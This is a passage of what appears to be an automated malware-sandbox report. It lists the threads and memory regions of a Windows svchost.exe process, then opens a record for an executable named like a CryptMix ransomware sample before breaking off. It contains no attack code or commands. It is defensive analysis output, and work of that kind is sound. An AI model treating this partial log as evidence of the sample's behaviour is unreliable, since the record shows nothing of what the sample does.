0xbe4 Thread: id = 122 os_tid = 0x8a4 Thread: id = 202 os_tid = 0xb34 Process: id = "21" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xbd97000" os_pid = "0x3ec" os_integrity_level = "0x4000" os_privileges = "0x60801000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0xbbc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c9ec" [0xc000000f], "LOCAL" [0x7] Region: id = 1359 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1360 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1361 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1362 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1363 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1364 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1365 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1366 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1367 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1368 start_va = 0x100000 end_va = 0x110fff entry_point = 0x116060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1369 start_va = 0x120000 end_va = 0x123fff entry_point = 0x120000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 1370 start_va = 0x130000 end_va = 0x131fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1371 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 1372 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1373 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1374 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 1375 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1376 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 1377 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1378 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 1379 start_va = 0x650000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1380 start_va = 0x7e0000 end_va = 0x89ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 1381 start_va = 0x8a0000 end_va = 0xc92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1382 start_va = 0xca0000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 1383 start_va = 0xdf0000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1384 start_va = 0xe90000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 1385 start_va = 0xf30000 end_va = 0xfaffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 1386 start_va = 0x1020000 end_va = 0x102ffff entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1387 start_va = 0x1040000 end_va = 0x130efff entry_point = 0x1040000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1388 start_va = 0x1340000 end_va = 0x13bffff entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1389 start_va = 0x1440000 end_va = 0x144ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 1390 start_va = 0x1470000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 1391 start_va = 0x14f0000 end_va = 0x15effff entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 1392 start_va = 0x1610000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 1393 start_va = 0x1690000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 1394 start_va = 0x1720000 end_va = 0x179ffff entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 1395 start_va = 0x17b0000 end_va = 0x17bffff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 1396 start_va = 0x17d0000 end_va = 0x184ffff entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 1397 start_va = 0x1900000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 1398 start_va = 0x1990000 end_va = 0x1a0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 1399 start_va = 0x1a60000 end_va = 0x1adffff entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 1400 start_va = 0x1b10000 end_va = 0x1b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b10000" filename = "" Region: id = 1401 start_va = 0x1b90000 end_va = 0x1c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 1402 start_va = 0x1c10000 end_va = 0x1ccffff entry_point = 0x1c10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1403 start_va = 0x1d00000 end_va = 0x1d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 1404 start_va = 0x1d80000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 1405 start_va = 0x1e90000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 1406 start_va = 0x1fd0000 end_va = 0x204ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1407 start_va = 0x2050000 end_va = 0x224ffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1408 start_va = 0x2290000 end_va = 0x230ffff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 1409 start_va = 0x23b0000 end_va = 0x242ffff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 1410 start_va = 0x73cb0000 end_va = 0x73cb2fff entry_point = 0x73cb0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 1411 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x772b5ea0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1412 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x773da2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1413 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1414 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1415 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1416 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1417 start_va = 0xff4e0000 end_va = 0xff4eafff entry_point = 0xff4e0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1418 start_va = 0x7fef42b0000 end_va = 0x7fef42c7fff entry_point = 0x7fef42b0000 region_type = mapped_file name = "vmictimeprovider.dll" filename = "\\Windows\\System32\\vmictimeprovider.dll" (normalized: "c:\\windows\\system32\\vmictimeprovider.dll") Region: id = 1419 start_va = 0x7fef42d0000 end_va = 0x7fef432ffff entry_point = 0x7fef42d0000 region_type = mapped_file name = "w32time.dll" filename = "\\Windows\\System32\\w32time.dll" (normalized: "c:\\windows\\system32\\w32time.dll") Region: id = 1420 start_va = 0x7fef63d0000 end_va = 0x7fef64a7fff entry_point = 0x7fef63d0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 1421 start_va = 0x7fef6500000 end_va = 0x7fef650bfff entry_point = 0x7fef6500000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 1422 start_va = 0x7fef6f90000 end_va = 0x7fef6f97fff entry_point = 0x7fef6f90000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1423 start_va = 0x7fef7460000 end_va = 0x7fef74dbfff entry_point = 0x7fef7460000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 1424 start_va = 0x7fef7e60000 end_va = 0x7fef7ed3fff entry_point = 0x7fef7e60000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 1425 start_va = 0x7fef8810000 end_va = 0x7fef881ffff entry_point = 0x7fef8810000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 1426 start_va = 0x7fef8820000 end_va = 0x7fef8831fff entry_point = 0x7fef8820000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 1427 start_va = 0x7fefa2f0000 end_va = 0x7fefa308fff entry_point = 0x7fefa2f0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 1428 start_va = 0x7fefa360000 end_va = 0x7fefa3c3fff entry_point = 0x7fefa360000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1429 start_va = 0x7fefa3d0000 end_va = 0x7fefa440fff entry_point = 0x7fefa3d0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1430 start_va = 0x7fefae70000 end_va = 0x7fefae87fff entry_point = 0x7fefae70000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1431 start_va = 0x7fefae90000 end_va = 0x7fefaea0fff entry_point = 0x7fefae90000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1432 start_va = 0x7fefaec0000 end_va = 0x7fefaf12fff entry_point = 0x7fefaec0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1433 start_va = 0x7fefaff0000 end_va = 0x7fefaff9fff entry_point = 0x7fefaff0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 1434 start_va = 0x7fefb010000 end_va = 0x7fefb01afff entry_point = 0x7fefb010000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1435 start_va = 0x7fefb020000 end_va = 0x7fefb046fff entry_point = 0x7fefb020000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1436 start_va = 0x7fefb090000 end_va = 0x7fefb0f6fff entry_point = 0x7fefb0a6060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 1437 start_va = 0x7fefb110000 end_va = 0x7fefb11bfff entry_point = 0x7fefb110000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1438 start_va = 0x7fefb190000 end_va = 0x7fefb1a4fff entry_point = 0x7fefb190000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1439 start_va = 0x7fefb720000 end_va = 0x7fefb738fff entry_point = 0x7fefb720000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 1440 start_va = 0x7fefb740000 end_va = 0x7fefb754fff entry_point = 0x7fefb740000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 1441 start_va = 0x7fefb780000 end_va = 0x7fefb78afff entry_point = 0x7fefb780000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 1442 start_va = 0x7fefb900000 end_va = 0x7fefb917fff entry_point = 0x7fefb900000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1443 start_va = 0x7fefc5d0000 end_va = 0x7fefc5dbfff entry_point = 0x7fefc5d1064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1444 start_va = 0x7fefc6a0000 end_va = 0x7fefc6a6fff entry_point = 0x7fefc6a0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1445 start_va = 0x7fefc790000 end_va = 0x7fefc7aafff entry_point = 0x7fefc790000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1446 start_va = 0x7fefc7b0000 end_va = 0x7fefc7cdfff entry_point = 0x7fefc7b0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1447 start_va = 0x7fefc900000 end_va = 0x7fefc909fff entry_point = 0x7fefc900000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1448 start_va = 0x7fefca00000 end_va = 0x7fefca46fff entry_point = 0x7fefca01064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1449 start_va = 0x7fefcaf0000 end_va = 0x7fefcb1ffff entry_point = 0x7fefcaf0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1450 start_va = 0x7fefcb20000 end_va = 0x7fefcb7afff entry_point = 0x7fefcb20000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1451 start_va = 0x7fefcc90000 end_va = 0x7fefcc96fff entry_point = 0x7fefcc90000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1452 start_va = 0x7fefcca0000 end_va = 0x7fefccf4fff entry_point = 0x7fefcca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1453 start_va = 0x7fefcd00000 end_va = 0x7fefcd16fff entry_point = 0x7fefcd032b8 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1454 start_va = 0x7fefcfa0000 end_va = 0x7fefcfb3fff entry_point = 0x7fefcfa4160 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 1455 start_va = 0x7fefd2a0000 end_va = 0x7fefd2aafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1456 start_va = 0x7fefd2d0000 end_va = 0x7fefd2f4fff entry_point = 0x7fefd2d0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1457 start_va = 0x7fefd300000 end_va = 0x7fefd30efff entry_point = 0x7fefd301010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1458 start_va = 0x7fefd310000 end_va = 0x7fefd3a0fff entry_point = 0x7fefd310000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1459 start_va = 0x7fefd3f0000 end_va = 0x7fefd403fff entry_point = 0x7fefd3f10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1460 start_va = 0x7fefd410000 end_va = 0x7fefd41efff entry_point = 0x7fefd410000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1461 start_va = 0x7fefd580000 end_va = 0x7fefd5eafff entry_point = 0x7fefd5830e0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1462 start_va = 0x7fefd7e0000 end_va = 0x7fefd87efff entry_point = 0x7fefd7e25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1463 start_va = 0x7fefdb90000 end_va = 0x7fefdc98fff entry_point = 0x7fefdb91064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1464 start_va = 0x7fefdca0000 end_va = 0x7fefdcadfff entry_point = 0x7fefdca1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1465 start_va = 0x7fefde90000 end_va = 0x7fefdedcfff entry_point = 0x7fefde90000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1466 start_va = 0x7fefe020000 end_va = 0x7fefe0f6fff entry_point = 0x7fefe023274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1467 start_va = 0x7fefe100000 end_va = 0x7fefe11efff entry_point = 0x7fefe1060e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1468 start_va = 0x7fefeeb0000 end_va = 0x7fefef48fff entry_point = 0x7fefeeb1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1469 start_va = 0x7fefef50000 end_va = 0x7feff07cfff entry_point = 0x7fefef9ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1470 start_va = 0x7feff2e0000 end_va = 0x7feff346fff entry_point = 0x7feff2eb03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1471 start_va = 0x7feff350000 end_va = 0x7feff418fff entry_point = 0x7feff3ca874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1472 start_va = 0x7feff420000 end_va = 0x7feff622fff entry_point = 0x7feff443330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1473 start_va = 0x7feff630000 end_va = 0x7feff70afff entry_point = 0x7feff650760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1474 start_va = 0x7feff710000 end_va = 0x7feff780fff entry_point = 0x7feff721e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1475 start_va = 0x7feff790000 end_va = 0x7feff797fff entry_point = 0x7feff790000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1476 start_va = 0x7feff7a0000 end_va = 0x7feff7cdfff entry_point = 0x7feff7a1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1477 start_va = 0x7feff7e0000 end_va = 0x7feff7e0fff entry_point = 0x7feff7e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1478 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1479 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1480 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1481 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1482 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1483 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 1484 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1485 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1486 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1487 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1488 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1489 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1490 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1491 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1492 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 1493 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1494 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1495 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1496 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1497 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 63 os_tid = 0x324 Thread: id = 64 os_tid = 0x5f0 Thread: id = 65 os_tid = 0x760 Thread: id = 66 os_tid = 0x798 Thread: id = 67 os_tid = 0x7a8 Thread: id = 68 os_tid = 0x790 Thread: id = 69 os_tid = 0x738 Thread: id = 70 os_tid = 0x720 Thread: id = 71 os_tid = 0x704 Thread: id = 72 os_tid = 0x6f4 Thread: id = 73 os_tid = 0x544 Thread: id = 74 os_tid = 0x4e8 Thread: id = 75 os_tid = 0x128 Thread: id = 76 os_tid = 0x12c Thread: id = 77 os_tid = 0x118 Thread: id = 78 os_tid = 0x11c Thread: id = 79 os_tid = 0xf0 Thread: id = 80 os_tid = 0x3f0 Thread: id = 124 os_tid = 0x840 Thread: id = 201 os_tid = 0xae4 Process: id = "22" image_name = "xzzx_cryptmix.vir.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe" page_root = "0x22085000" os_pid = "0x544" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 